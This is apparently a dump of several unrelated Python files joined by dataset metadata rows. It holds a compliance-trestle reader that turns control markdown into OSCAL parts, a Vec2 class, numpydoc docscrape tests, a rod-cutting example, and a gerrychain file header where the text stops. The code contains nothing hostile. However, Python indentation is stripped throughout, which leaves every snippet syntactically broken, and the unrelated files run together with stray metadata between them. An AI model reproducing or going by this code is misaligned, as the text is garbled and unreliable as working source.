def _read_parts(indent: int, ii: int, lines: List[str], parent_id: str,
parts: List[common.Part]) -> Tuple[int, List[common.Part]]:
"""If indentation level goes up or down, create new list or close current one."""
while True:
ii, new_indent, line = ControlIOReader._get_next_indent(ii, lines)
if new_indent < 0:
# we are done reading control statement
return ii, parts
if new_indent == indent:
# create new item part and add to current list of parts
id_text, prose = ControlIOReader._read_part_id_prose(line)
# id_text is the part id and needs to be as a label property value
# if none is there then create one from previous part, or use default
if not id_text:
prev_label = ControlIOWriter._get_label(parts[-1]) if parts else ''
id_text = ControlIOReader._create_next_label(prev_label, indent)
id_ = ControlIOReader._strip_to_make_ncname(parent_id + '.' + id_text)
name = 'objective' if id_.find('_obj') > 0 else 'item'
prop = common.Property(name='label', value=id_text)
part = common.Part(name=name, id=id_, prose=prose, props=[prop])
parts.append(part)
ii += 1
elif new_indent > indent:
# add new list of parts to last part and continue
if len(parts) == 0:
raise TrestleError(f'Improper indentation structure: {line}')
ii, new_parts = ControlIOReader._read_parts(new_indent, ii, lines, parts[-1].id, [])
if new_parts:
parts[-1].parts = new_parts
else:
# return list of sub-parts
return ii, parts
@staticmethod
def _read_control_statement(ii: int, lines: List[str], control_id: str) -> Tuple[int, common.Part]:
"""Search for the Control statement and read until next ## Control."""
while 0 <= ii < len(lines) and not lines[ii].startswith('## Control '):
ii += 1
if ii >= len(lines):
raise TrestleError(f'Control statement not found for control {control_id}')
ii += 1
ii, line = ControlIOReader._get_next_line(ii, lines)
if ii < 0:
# This means no statement and control withdrawn (this happens in NIST catalog)
return ii, None
if line and line[0] == ' ' and line.lstrip()[0] != '-':
# prose that appears indented but has no - : treat it as the normal statement prose
line = line.lstrip()
indent = -1
ii += 1
else:
ii, indent, line = ControlIOReader._get_next_indent(ii, lines)
statement_part = common.Part(name='statement', id=f'{control_id}_smt')
# first line is either statement prose or start of statement parts
if indent < 0:
statement_part.prose = line
ii += 1
# we have absorbed possible statement prose.
# now just read parts recursively
# if there was no statement prose, this will re-read the line just read
# as the start of the statement's parts
ii, parts = ControlIOReader._read_parts(0, ii, lines, statement_part.id, [])
statement_part.parts = parts if parts else None
return ii, statement_part
@staticmethod
def _read_control_objective(ii: int, lines: List[str], control_id: str) -> Tuple[int, Optional[common.Part]]:
ii_orig = ii
while 0 <= ii < len(lines) and not lines[ii].startswith('## Control Objective'):
ii += 1
if ii >= len(lines):
return ii_orig, None
ii += 1
ii, line = ControlIOReader._get_next_line(ii, lines)
if ii < 0:
raise TrestleError(f'Unable to parse objective from control markdown {control_id}')
if line and line[0] == ' ' and line.lstrip()[0] != '-':
# prose that appears indented but has no - : treat it as the normal objective prose
line = line.lstrip()
indent = -1
ii += 1
else:
ii, indent, line = ControlIOReader._get_next_indent(ii, lines)
objective_part = common.Part(name='objective', id=f'{control_id}_obj')
# first line is either objective prose or start of objective parts
if indent < 0:
objective_part.prose = line
ii += 1
# we have absorbed possible objective prose.
# now just read parts recursively
# if there was no objective prose, this will re-read the line just read
# as the start of the objective's parts
ii, parts = ControlIOReader._read_parts(0, ii, lines, objective_part.id, [])
objective_part.parts = parts if parts else None
return ii, objective_part
@staticmethod
def _read_sections(ii: int, lines: List[str], control_id: str,
control_parts: List[common.Part]) -> Tuple[int, List[common.Part]]:
"""Read all sections following the section separated by ## Control."""
new_parts = []
prefix = '## Control '
while 0 <= ii < len(lines):
line = lines[ii]
if line.startswith('## What is the solution') or line.startswith('# Editable Content'):
ii += 1
continue
if not line:
ii += 1
continue
if line and not line.startswith(prefix):
# the control has no sections to read, so exit the loop
break
label = line[len(prefix):].lstrip()
prose = ''
ii += 1
while 0 <= ii < len(lines) and not lines[ii].startswith(prefix) and not lines[ii].startswith(
'# Editable Content'):
prose = '\n'.join([prose, lines[ii]])
ii += 1
if prose:
id_ = ControlIOReader._strip_to_make_ncname(control_id + '_smt.' + label)
label = ControlIOReader._strip_to_make_ncname(label)
new_parts.append(common.Part(id=id_, name=label, prose=prose.strip('\n')))
if new_parts:
if control_parts:
control_parts.extend(new_parts)
else:
control_parts = new_parts
if not control_parts:
control_parts = None
return ii, control_parts
@staticmethod
def _clean_prose(prose: List[str]) -> List[str]:
# remove empty and horizontal rule lines at start and end of list of prose lines
forward_index = 0
for line in prose:
if line.strip() and not line.startswith('____'):
break
forward_index += 1
new_prose = prose[forward_index:]
reverse_index = 0
for line in reversed(new_prose):
if line.strip() and not line.startswith('____'):
break
reverse_index += 1
clean_prose = new_prose[:len(new_prose) - reverse_index]
clean_prose = clean_prose if clean_prose else ['']
# if there is no useful prose this will return [''] and allow generation of a statement with empty prose
return clean_prose
@staticmethod
def _simplify_name(name: str) -> str:
name = name.lower().strip()
return re.sub(' +', ' ', name)
@staticmethod
def _comp_name_in_dict(comp_name: str, comp_dict: Dict[str, List[Dict[str, str]]]) -> str:
"""If the name is already in the dict in a similar form, stick to that form."""
simple_name = ControlIOReader._simplify_name(comp_name)
for name in comp_dict.keys():
if simple_name == ControlIOReader._simplify_name(name):
return name
return comp_name
@staticmethod
def _add_node_to_dict(
comp_name: str,
label: str,
comp_dict: Dict[str, Dict[str, List[str]]],
node: MarkdownNode,
control_id: str,
comp_list: List[str]
) -> None:
prose = ControlIOReader._clean_prose(node.content.text)
if node.key.startswith('### '):
if len(node.key.split()) <= 1:
raise TrestleError(f'Line in control {control_id} markdown starts with ### but has no component name.')
comp_name = node.key.split(' ', 1)[1].strip()
simp_comp_name = ControlIOReader._simplify_name(comp_name)
if simp_comp_name == ControlIOReader._simplify_name(const.SSP_MAIN_COMP_NAME):
raise TrestleError(
f'Response in control {control_id} has {const.SSP_MAIN_COMP_NAME} as a component heading. '
'Instead, place all response prose for the default component at the top of th section, '
'with no ### component specified. It will be entered as prose for the default system component.'
)
if simp_comp_name in comp_list:
raise TrestleError(
f'Control {control_id} has a section with two ### component headings for {comp_name}. '
'Please combine the sections so there is only one heading for each component in a statement.'
)
comp_list.append(simp_comp_name)
comp_name = ControlIOReader._comp_name_in_dict(comp_name, comp_dict)
if comp_name in comp_dict:
if label in comp_dict[comp_name]:
comp_dict[comp_name][label].extend(prose)
else:
comp_dict[comp_name][label] = prose
else:
comp_dict[comp_name] = {label: prose}
for subnode in node.subnodes:
ControlIOReader._add_node_to_dict(comp_name, label, comp_dict, subnode, control_id, comp_list)
@staticmethod
def read_all_implementation_prose_and_header(
control_file: pathlib.Path
) -> Tuple[Dict[str, Dict[str, List[str]]], Dict[str, List[str]]]:
"""
Find all labels and associated prose in this control.
Args:
control_file: path to the control markdown file
Returns:
Dictionary by comp_name of Dictionaries of part labels and corresponding prose read from the markdown file.
Also returns the yaml header as dict in second part of tuple.
This does not generate components - it only tracks component names and associated responses.
"""
comp_dict = {}
yaml_header = {}
# this level only adds for top level component but add_node_to_dict can add for other components
comp_name = const.SSP_MAIN_COMP_NAME
control_id = control_file.stem
try:
if not control_file.exists():
return comp_dict, yaml_header
md_api = MarkdownAPI()
yaml_header, control = md_api.processor.process_markdown(control_file)
imp_string = 'Implementation'
headers = control.get_all_headers_for_key(imp_string, False)
header_list = list(headers)
if not header_list:
# if statement has no parts there is only one response for entire control
headers = control.get_all_headers_for_key(const.SSP_MD_IMPLEMENTATION_QUESTION, False)
# should be only one header, so warn if others found
n_headers = 0
for header in headers:
node = control.get_node_for_key(header)
ControlIOReader._add_node_to_dict(comp_name, 'Statement', comp_dict, node, control_id, [])
n_headers += 1
if n_headers > 1:
logger.warning(
f'Control {control_id} has single statement with extra response #{n_headers}'
' when it should only have one.'
)
else:
for header in header_list:
tokens = header.split(' ', 2)
if tokens[0] == '##' and tokens[1] == imp_string:
label = tokens[2].strip()
node = control.get_node_for_key(header)
ControlIOReader._add_node_to_dict(comp_name, label, comp_dict, node, control_id, [])
except TrestleError as e:
logger.error(f'Error occurred reading {control_file}')
raise e
return comp_dict, yaml_header
@staticmethod
def _insert_header_content(imp_req: ossp.ImplementedRequirement, header: Dict[str, Any], control_id: str) -> None:
"""Insert yaml header content into the imp_req and its by_comps."""
dict_ = header.get(const.SSP_FEDRAMP_TAG, {})
# if an attribute is in the dict but it is None, need to make sure we get empty list anyway
control_orig = as_list(dict_.get(const.CONTROL_ORIGINATION, []))
imp_status = as_list(dict_.get(const.IMPLEMENTATION_STATUS, []))
roles = as_list(dict_.get(const.RESPONSIBLE_ROLES, []))
props = []
responsible_roles = []
for co in control_orig:
if isinstance(co, str):
props.append(common.Property(ns=const.NAMESPACE_FEDRAMP, name=const.CONTROL_ORIGINATION, value=co))
elif isinstance(co, dict):
if const.INHERITED in co:
uuid = co[const.INHERITED]
props.append(common.Property(name=const.LEV_AUTH_UUID, value=uuid))
props.append(
common.Property(
ns=const.NAMESPACE_FEDRAMP, name=const.CONTROL_ORIGINATION, value=const.INHERITED
)
)
else:
raise TrestleError(f'The yaml header for control {control_id} has unexpected content: {co}')
else:
raise TrestleError(f'The yaml header for control {control_id} has unexpected content: {co}')
for status in imp_status:
if isinstance(status, str):
props.append(
common.Property(ns=const.NAMESPACE_FEDRAMP, name=const.IMPLEMENTATION_STATUS, value=status)
)
elif isinstance(status, dict):
if const.PLANNED in status:
if const.COMPLETION_DATE not in status:
raise TrestleError(
f'Planned status in the control {control_id} yaml header must '
f'specify completion date: {status}'
)
props.append(
common.Property(ns=const.NAMESPACE_FEDRAMP, name=const.PLANNED, value=status[const.PLANNED])
)
datestr = status[const.COMPLETION_DATE]
if isinstance(datestr, datetime):
datestr = datestr.strftime('%Y-%m-%d')
else:
datestr = str(datestr)
props.append(
common.Property(ns=const.NAMESPACE_FEDRAMP, name=const.PLANNED_COMPLETION_DATE, value=datestr)
)
else:
if len(status) != 1:
raise TrestleError(f'Unexpected content in control {control_id} yaml header: {status}')
value = list(status.keys())[0]
remark = list(status.values())[0]
props.append(
common.Property(
ns=const.NAMESPACE_FEDRAMP,
name=const.IMPLEMENTATION_STATUS,
value=value,
remarks=common.Remarks(__root__=remark)
)
)
else:
raise TrestleError(f'Unexpected content in control {control_id} yaml header: {status}')
for role in roles:
if isinstance(role, str):
# role_id must conform to NCNAME regex
role = role.strip().replace(' ', '_')
if role:
responsible_roles.append(common.ResponsibleRole(role_id=role))
else:
logger.warning(f'Role in header for control {control_id} not recognized: {role}')
if props:
imp_req.props = as_list(imp_req.props)
imp_req.props.extend(props)
if responsible_roles:
imp_req.responsible_roles = as_list(imp_req.responsible_roles)
imp_req.responsible_roles.extend(responsible_roles)
imp_req.responsible_roles = none_if_empty(imp_req.responsible_roles)
# enforce single list of resp. roles for control and each by_comp
for by_comp in as_list(imp_req.by_components):
by_comp.responsible_roles = imp_req.responsible_roles
@staticmethod
def read_implemented_requirement(
control_file: pathlib.Path, avail_comps: Dict[str, ossp.SystemComponent]
) -> ossp.ImplementedRequirement:
"""
Get the implementated requirement associated with given control and link to existing components or new ones.
Args:
control_file: path of the control markdown file
avail_comps: dictionary of known components keyed by component name
Returns:
The one implemented requirement for this control.
Notes:
Each statement may have several responses, with each response in a by_component for a specific component.
statement_map keeps track of statements that may have several by_component responses.
"""
control_id = control_file.stem
comp_dict, header = ControlIOReader.read_all_implementation_prose_and_header(control_file)
statement_map: Dict[str, ossp.Statement] = {}
# create a new implemented requirement linked to the control id to hold the statements
imp_req: ossp.ImplementedRequirement = gens.generate_sample_model(ossp.ImplementedRequirement)
imp_req.control_id = control_id
# the comp_dict captures all component names referenced by the control
for comp_name in comp_dict.keys():
if comp_name in avail_comps:
component = avail_comps[comp_name]
else:
# here is where we create a new component on the fly as needed
component = gens.generate_sample_model(ossp.SystemComponent)
component.title = comp_name
avail_comps[comp_name] = component
for label, prose_lines in comp_dict[comp_name].items():
# create a statement to hold the by-components and assign the statement id
if label == 'Statement':
statement_id = f'{control_id}_smt'
else:
clean_label = label.strip('.')
statement_id = ControlIOReader._strip_to_make_ncname(f'{control_id}_smt.{clean_label}')
if statement_id in statement_map:
statement = statement_map[statement_id]
else:
statement: ossp.Statement = gens.generate_sample_model(ossp.Statement)
statement.statement_id = statement_id
statement.by_components = []
statement_map[statement_id] = statement
# create a new by-component to add to this statement
by_comp: ossp.ByComponent = gens.generate_sample_model(ossp.ByComponent)
# link it to the component uuid
by_comp.component_uuid = component.uuid
# add the response prose to the description
by_comp.description = '\n'.join(prose_lines)
statement.by_components.append(by_comp)
imp_req.statements = list(statement_map.values())
ControlIOReader._insert_header_content(imp_req, header, control_id)
return imp_req
@staticmethod
def _read_added_part(ii: int, lines: List[str], control_id: str) -> Tuple[int, Optional[common.Part]]:
"""Read a single part indicated by ## Control foo."""
while 0 <= ii < len(lines):
# look for ## Control foo - then read prose
line = lines[ii]
prefix = '## Control '
if line:
if not line.startswith(prefix):
raise TrestleError(f'Unexpected line in Editable Content for control {control_id}: {line}')
part_name_raw = line[len(prefix):]
part_name = spaces_and_caps_to_snake(part_name_raw)
prose_lines = []
ii += 1
have_content = False
while 0 <= ii < len(lines):
line = lines[ii]
if not line.startswith(prefix):
if line:
have_content = True
prose_lines.append(line)
ii += 1
continue
break
if have_content:
prose = '\n'.join(prose_lines)
# strip leading / trailing new lines.
prose = prose.strip('\n')
id_ = f'{control_id}_{part_name}'
part = common.Part(id=id_, name=part_name, prose=prose)
return ii, part
ii += 1
return -1, None
@staticmethod
def read_new_alters_and_params(control_path: pathlib.Path) -> Tuple[List[prof.Alter], Dict[str, str]]:
"""Get parts for the markdown control corresponding to Editable Content - if any."""
control_id = control_path.stem
new_alters: List[prof.Alter] = []
param_dict: Dict[str, str] = {}
lines, header = ControlIOReader._load_control_lines_and_header(control_path)
ii = 0
while 0 <= ii < len(lines):
line = lines[ii]
if line.startswith('# Editable Content'):
ii += 1
while 0 <= ii < len(lines):
ii, part = ControlIOReader._read_added_part(ii, lines, control_id)
if ii < 0:
break
alter = prof.Alter(
control_id=control_id,
adds=[prof.Add(parts=[part], position='after', by_id=f'{control_id}_smt')]
)
new_alters.append(alter)
else:
ii += 1
header_params = header.get(const.SET_PARAMS_TAG, {})
if header_params:
param_dict.update(header_params)
return new_alters, param_dict
@staticmethod
def get_control_param_dict(control: cat.Control, values_only: bool) -> Dict[str, str]:
"""Get a dict of the parameters in a control and their values."""
param_dict: Dict[str, str] = {}
params: List[common.Parameter] = as_list(control.params)
for param in params:
value_str = 'No value found'
if param.label:
value_str = param.label
if param.values:
values = [val.__root__ for val in param.values]
if len(values) == 1:
value_str = values[0]
else:
value_str = f"[{', '.join(value for value in values)}]"
# if there isn't an actual value then ignore this param
elif values_only:
continue
param_dict[param.id] = value_str
return param_dict
@staticmethod
def read_control(control_path: pathlib.Path) -> cat.Control:
"""Read the control markdown file."""
control = gens.generate_sample_model(cat.Control)
md_api = MarkdownAPI()
_, control_tree = md_api.processor.process_markdown(control_path)
control_titles = list(control_tree.get_all_headers_for_level(1))
if len(control_titles) == 0:
raise TrestleError(f'Control markdown: {control_path} contains no control title.')
control.id, _, control.title = ControlIOReader._read_id_group_id_title(control_titles[0])
control_headers = list(control_tree.get_all_headers_for_level(2))
if len(control_headers) == 0:
raise TrestleError(f'Control markdown: {control_path} contains no control statements.')
control_statement = control_tree.get_node_for_key(control_headers[0])
rc, statement_part = ControlIOReader._read_control_statement(
0, control_statement.content.raw_text.split('\n'), control.id
)
if rc < 0:
return control
control.parts = [statement_part] if statement_part else None
control_objective = control_tree.get_node_for_key('## Control Objective')
if control_objective is not None:
_, objective_part = ControlIOReader._read_control_objective(
0, control_objective.content.raw_text.split('\n'), control.id
)
if objective_part:
if control.parts:
control.parts.append(objective_part)
else:
control.parts = [objective_part]
for header_key in control_tree.get_all_headers_for_key('## Control', False):
if header_key not in {control_headers[0], '## Control Objective', control_titles[0]}:
section_node = control_tree.get_node_for_key(header_key)
_, control.parts = ControlIOReader._read_sections(
0, section_node.content.raw_text.split('\n'), control.id, control.parts
)
return control
| 46.145189 | 164 | 0.587828 |
4a1f6444e2b8537d0e12f4b812b194e85c7c4869 | 127 | py | Python | FaceDetectionModule/helper_types/vector.py | Bricktheworld/rhombus-api-examples-python | b4778c3a635786070ee10a3131b1a1f7f6ebac36 | [
"MIT"
] | null | null | null | FaceDetectionModule/helper_types/vector.py | Bricktheworld/rhombus-api-examples-python | b4778c3a635786070ee10a3131b1a1f7f6ebac36 | [
"MIT"
] | 20 | 2021-06-08T22:29:20.000Z | 2022-01-15T19:51:46.000Z | FaceDetectionModule/helper_types/vector.py | Bricktheworld/rhombus-api-examples-python | b4778c3a635786070ee10a3131b1a1f7f6ebac36 | [
"MIT"
] | 9 | 2021-06-08T22:15:35.000Z | 2022-03-03T05:19:58.000Z | class Vec2:
x: float
y: float
def __init__(self, x:float, y:float) -> None:
self.x = x
self.y = y
| 15.875 | 49 | 0.503937 |
4a1f64cf521fe09b168f544cdd194dd0b5234608 | 13,129 | py | Python | doc/sphinxext/tests/test_docscrape.py | willgrass/pandas | 137fe223d1cf0663c924344473033b84750888bb | [
"BSD-3-Clause"
] | 2 | 2020-07-03T12:00:29.000Z | 2021-04-18T06:54:30.000Z | doc/sphinxext/tests/test_docscrape.py | willgrass/pandas | 137fe223d1cf0663c924344473033b84750888bb | [
"BSD-3-Clause"
] | null | null | null | doc/sphinxext/tests/test_docscrape.py | willgrass/pandas | 137fe223d1cf0663c924344473033b84750888bb | [
"BSD-3-Clause"
] | null | null | null | # -*- encoding:utf-8 -*-
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from docscrape import NumpyDocString, FunctionDoc
from docscrape_sphinx import SphinxDocString
from nose.tools import *
doc_txt = '''\
numpy.multivariate_normal(mean, cov, shape=None)
Draw values from a multivariate normal distribution with specified
mean and covariance.
The multivariate normal or Gaussian distribution is a generalisation
of the one-dimensional normal distribution to higher dimensions.
Parameters
----------
mean : (N,) ndarray
Mean of the N-dimensional distribution.
.. math::
(1+2+3)/3
cov : (N,N) ndarray
Covariance matrix of the distribution.
shape : tuple of ints
Given a shape of, for example, (m,n,k), m*n*k samples are
generated, and packed in an m-by-n-by-k arrangement. Because
each sample is N-dimensional, the output shape is (m,n,k,N).
Returns
-------
out : ndarray
The drawn samples, arranged according to `shape`. If the
shape given is (m,n,...), then the shape of `out` is is
(m,n,...,N).
In other words, each entry ``out[i,j,...,:]`` is an N-dimensional
value drawn from the distribution.
Warnings
--------
Certain warnings apply.
Notes
-----
Instead of specifying the full covariance matrix, popular
approximations include:
- Spherical covariance (`cov` is a multiple of the identity matrix)
- Diagonal covariance (`cov` has non-negative elements only on the diagonal)
This geometrical property can be seen in two dimensions by plotting
generated data-points:
>>> mean = [0,0]
>>> cov = [[1,0],[0,100]] # diagonal covariance, points lie on x or y-axis
>>> x,y = multivariate_normal(mean,cov,5000).T
>>> plt.plot(x,y,'x'); plt.axis('equal'); plt.show()
Note that the covariance matrix must be symmetric and non-negative
definite.
References
----------
.. [1] A. Papoulis, "Probability, Random Variables, and Stochastic
Processes," 3rd ed., McGraw-Hill Companies, 1991
.. [2] R.O. Duda, P.E. Hart, and D.G. Stork, "Pattern Classification,"
2nd ed., Wiley, 2001.
See Also
--------
some, other, funcs
otherfunc : relationship
Examples
--------
>>> mean = (1,2)
>>> cov = [[1,0],[1,0]]
>>> x = multivariate_normal(mean,cov,(3,3))
>>> print x.shape
(3, 3, 2)
The following is probably true, given that 0.6 is roughly twice the
standard deviation:
>>> print list( (x[0,0,:] - mean) < 0.6 )
[True, True]
.. index:: random
:refguide: random;distributions, random;gauss
'''
doc = NumpyDocString(doc_txt)
def test_signature():
assert doc['Signature'].startswith('numpy.multivariate_normal(')
assert doc['Signature'].endswith('shape=None)')
def test_summary():
assert doc['Summary'][0].startswith('Draw values')
assert doc['Summary'][-1].endswith('covariance.')
def test_extended_summary():
assert doc['Extended Summary'][0].startswith('The multivariate normal')
def test_parameters():
assert_equal(len(doc['Parameters']), 3)
assert_equal([n for n,_,_ in doc['Parameters']], ['mean','cov','shape'])
arg, arg_type, desc = doc['Parameters'][1]
assert_equal(arg_type, '(N,N) ndarray')
assert desc[0].startswith('Covariance matrix')
assert doc['Parameters'][0][-1][-2] == ' (1+2+3)/3'
def test_returns():
assert_equal(len(doc['Returns']), 1)
arg, arg_type, desc = doc['Returns'][0]
assert_equal(arg, 'out')
assert_equal(arg_type, 'ndarray')
assert desc[0].startswith('The drawn samples')
assert desc[-1].endswith('distribution.')
def test_notes():
assert doc['Notes'][0].startswith('Instead')
assert doc['Notes'][-1].endswith('definite.')
assert_equal(len(doc['Notes']), 17)
def test_references():
assert doc['References'][0].startswith('..')
assert doc['References'][-1].endswith('2001.')
def test_examples():
assert doc['Examples'][0].startswith('>>>')
assert doc['Examples'][-1].endswith('True]')
def test_index():
assert_equal(doc['index']['default'], 'random')
print doc['index']
assert_equal(len(doc['index']), 2)
assert_equal(len(doc['index']['refguide']), 2)
def non_blank_line_by_line_compare(a,b):
a = [l for l in a.split('\n') if l.strip()]
b = [l for l in b.split('\n') if l.strip()]
for n,line in enumerate(a):
if not line == b[n]:
raise AssertionError("Lines %s of a and b differ: "
"\n>>> %s\n<<< %s\n" %
(n,line,b[n]))
def test_str():
non_blank_line_by_line_compare(str(doc),
"""numpy.multivariate_normal(mean, cov, shape=None)
Draw values from a multivariate normal distribution with specified
mean and covariance.
The multivariate normal or Gaussian distribution is a generalisation
of the one-dimensional normal distribution to higher dimensions.
Parameters
----------
mean : (N,) ndarray
Mean of the N-dimensional distribution.
.. math::
(1+2+3)/3
cov : (N,N) ndarray
Covariance matrix of the distribution.
shape : tuple of ints
Given a shape of, for example, (m,n,k), m*n*k samples are
generated, and packed in an m-by-n-by-k arrangement. Because
each sample is N-dimensional, the output shape is (m,n,k,N).
Returns
-------
out : ndarray
The drawn samples, arranged according to `shape`. If the
shape given is (m,n,...), then the shape of `out` is is
(m,n,...,N).
In other words, each entry ``out[i,j,...,:]`` is an N-dimensional
value drawn from the distribution.
Warnings
--------
Certain warnings apply.
See Also
--------
`some`_, `other`_, `funcs`_
`otherfunc`_
relationship
Notes
-----
Instead of specifying the full covariance matrix, popular
approximations include:
- Spherical covariance (`cov` is a multiple of the identity matrix)
- Diagonal covariance (`cov` has non-negative elements only on the diagonal)
This geometrical property can be seen in two dimensions by plotting
generated data-points:
>>> mean = [0,0]
>>> cov = [[1,0],[0,100]] # diagonal covariance, points lie on x or y-axis
>>> x,y = multivariate_normal(mean,cov,5000).T
>>> plt.plot(x,y,'x'); plt.axis('equal'); plt.show()
Note that the covariance matrix must be symmetric and non-negative
definite.
References
----------
.. [1] A. Papoulis, "Probability, Random Variables, and Stochastic
Processes," 3rd ed., McGraw-Hill Companies, 1991
.. [2] R.O. Duda, P.E. Hart, and D.G. Stork, "Pattern Classification,"
2nd ed., Wiley, 2001.
Examples
--------
>>> mean = (1,2)
>>> cov = [[1,0],[1,0]]
>>> x = multivariate_normal(mean,cov,(3,3))
>>> print x.shape
(3, 3, 2)
The following is probably true, given that 0.6 is roughly twice the
standard deviation:
>>> print list( (x[0,0,:] - mean) < 0.6 )
[True, True]
.. index:: random
:refguide: random;distributions, random;gauss""")
def test_sphinx_str():
sphinx_doc = SphinxDocString(doc_txt)
non_blank_line_by_line_compare(str(sphinx_doc),
"""
.. index:: random
single: random;distributions, random;gauss
Draw values from a multivariate normal distribution with specified
mean and covariance.
The multivariate normal or Gaussian distribution is a generalisation
of the one-dimensional normal distribution to higher dimensions.
:Parameters:
**mean** : (N,) ndarray
Mean of the N-dimensional distribution.
.. math::
(1+2+3)/3
**cov** : (N,N) ndarray
Covariance matrix of the distribution.
**shape** : tuple of ints
Given a shape of, for example, (m,n,k), m*n*k samples are
generated, and packed in an m-by-n-by-k arrangement. Because
each sample is N-dimensional, the output shape is (m,n,k,N).
:Returns:
**out** : ndarray
The drawn samples, arranged according to `shape`. If the
shape given is (m,n,...), then the shape of `out` is is
(m,n,...,N).
In other words, each entry ``out[i,j,...,:]`` is an N-dimensional
value drawn from the distribution.
.. warning::
Certain warnings apply.
.. seealso::
:obj:`some`, :obj:`other`, :obj:`funcs`
:obj:`otherfunc`
relationship
.. rubric:: Notes
Instead of specifying the full covariance matrix, popular
approximations include:
- Spherical covariance (`cov` is a multiple of the identity matrix)
- Diagonal covariance (`cov` has non-negative elements only on the diagonal)
This geometrical property can be seen in two dimensions by plotting
generated data-points:
>>> mean = [0,0]
>>> cov = [[1,0],[0,100]] # diagonal covariance, points lie on x or y-axis
>>> x,y = multivariate_normal(mean,cov,5000).T
>>> plt.plot(x,y,'x'); plt.axis('equal'); plt.show()
Note that the covariance matrix must be symmetric and non-negative
definite.
.. rubric:: References
.. [1] A. Papoulis, "Probability, Random Variables, and Stochastic
Processes," 3rd ed., McGraw-Hill Companies, 1991
.. [2] R.O. Duda, P.E. Hart, and D.G. Stork, "Pattern Classification,"
2nd ed., Wiley, 2001.
.. rubric:: Examples
>>> mean = (1,2)
>>> cov = [[1,0],[1,0]]
>>> x = multivariate_normal(mean,cov,(3,3))
>>> print x.shape
(3, 3, 2)
The following is probably true, given that 0.6 is roughly twice the
standard deviation:
>>> print list( (x[0,0,:] - mean) < 0.6 )
[True, True]
""")
doc2 = NumpyDocString("""
Returns array of indices of the maximum values of along the given axis.
Parameters
----------
a : {array_like}
Array to look in.
axis : {None, integer}
If None, the index is into the flattened array, otherwise along
the specified axis""")
def test_parameters_without_extended_description():
assert_equal(len(doc2['Parameters']), 2)
doc3 = NumpyDocString("""
my_signature(*params, **kwds)
Return this and that.
""")
def test_escape_stars():
signature = str(doc3).split('\n')[0]
assert_equal(signature, 'my_signature(\*params, \*\*kwds)')
doc4 = NumpyDocString(
"""a.conj()
Return an array with all complex-valued elements conjugated.""")
def test_empty_extended_summary():
assert_equal(doc4['Extended Summary'], [])
doc5 = NumpyDocString(
"""
a.something()
Raises
------
LinAlgException
If array is singular.
""")
def test_raises():
assert_equal(len(doc5['Raises']), 1)
name,_,desc = doc5['Raises'][0]
assert_equal(name,'LinAlgException')
assert_equal(desc,['If array is singular.'])
def test_see_also():
doc6 = NumpyDocString(
"""
z(x,theta)
See Also
--------
func_a, func_b, func_c
func_d : some equivalent func
foo.func_e : some other func over
multiple lines
func_f, func_g, :meth:`func_h`, func_j,
func_k
:obj:`baz.obj_q`
:class:`class_j`: fubar
foobar
""")
assert len(doc6['See Also']) == 12
for func, desc, role in doc6['See Also']:
if func in ('func_a', 'func_b', 'func_c', 'func_f',
'func_g', 'func_h', 'func_j', 'func_k', 'baz.obj_q'):
assert(not desc)
else:
assert(desc)
if func == 'func_h':
assert role == 'meth'
elif func == 'baz.obj_q':
assert role == 'obj'
elif func == 'class_j':
assert role == 'class'
else:
assert role is None
if func == 'func_d':
assert desc == ['some equivalent func']
elif func == 'foo.func_e':
assert desc == ['some other func over', 'multiple lines']
elif func == 'class_j':
assert desc == ['fubar', 'foobar']
def test_see_also_print():
class Dummy(object):
"""
See Also
--------
func_a, func_b
func_c : some relationship
goes here
func_d
"""
pass
obj = Dummy()
s = str(FunctionDoc(obj, role='func'))
assert(':func:`func_a`, :func:`func_b`' in s)
assert(' some relationship' in s)
assert(':func:`func_d`' in s)
doc7 = NumpyDocString("""
Doc starts on second line.
""")
def test_empty_first_line():
assert doc7['Summary'][0].startswith('Doc starts')
def test_no_summary():
str(SphinxDocString("""
Parameters
----------"""))
def test_unicode():
doc = SphinxDocString("""
öäöäöäöäöåååå
öäöäöäööäååå
Parameters
----------
ååå : äää
ööö
Returns
-------
ååå : ööö
äää
""")
assert doc['Summary'][0] == u'öäöäöäöäöåååå'.encode('utf-8')
def test_plot_examples():
doc = SphinxDocString("""
Examples
--------
>>> import matplotlib.pyplot as plt
>>> plt.plot([1,2,3],[4,5,6])
>>> plt.show()
""")
assert 'plot::' in str(doc), str(doc)
doc = SphinxDocString("""
Examples
--------
.. plot::
import matplotlib.pyplot as plt
plt.plot([1,2,3],[4,5,6])
plt.show()
""")
assert str(doc).count('plot::') == 1, str(doc)
| 25.642578 | 80 | 0.619697 |
4a1f65c128c3aa0027e7a9e1938d90e083280c8f | 1,199 | py | Python | CLRS/Chapter 15/Dynamic Programming/15.2/cut_rod.py | pablotrinidad/competitive-programming | de16d007ca276330cd0a92bd5b75ce4e9e75fb59 | [
"MIT"
] | null | null | null | CLRS/Chapter 15/Dynamic Programming/15.2/cut_rod.py | pablotrinidad/competitive-programming | de16d007ca276330cd0a92bd5b75ce4e9e75fb59 | [
"MIT"
] | null | null | null | CLRS/Chapter 15/Dynamic Programming/15.2/cut_rod.py | pablotrinidad/competitive-programming | de16d007ca276330cd0a92bd5b75ce4e9e75fb59 | [
"MIT"
] | null | null | null | """Rod cutting.
Recursive top-down implementation.
"""
import cProfile
from random import randint
def cut_rod(p, n):
"""Cut rod.
Implements the computation in the equation 15.2 (r_n = max_{i <= i <= n}(p_i + r_{n-1})).
Where p is the array of prices by length and n the length of the rod.
"""
if n == 0:
return 0
q = 0
for i in range(n):
q = max(q, p[i] + cut_rod(p, n - (i + 1)))
return q
def cut_rod2(p, n, r={}):
"""Cut rod.
Same functionality as the original but implemented
as a top-down with memoization.
"""
q = r.get(n, None)
if q:
return q
else:
if n == 0:
return 0
else:
q = 0
for i in range(n):
q = max(q, p[i] + cut_rod2(p, n - (i + 1), r))
r[n] = q
return q
def test_algorithms(n):
"""Test algorithms with n-sized problems."""
p = [randint(1, 50) for _ in range(n)]
for i in range(1, n+1):
print('\n\n', '=' * 20, 'N:', i, '=' * 20)
cProfile.runctx('cut_rod2(p, i)', globals(), locals())
cProfile.runctx('cut_rod(p, i)', globals(), locals())
test_algorithms(25)
| 22.203704 | 93 | 0.51543 |
4a1f663e88483911aa4b30fead0272e8dce84bc7 | 4,943 | py | Python | gerrychain/constraints/validity.py | rwbogl/GerryChain | e7254ea62df5dc2c6eb6c60d0437d7152bb9649a | [
"BSD-3-Clause"
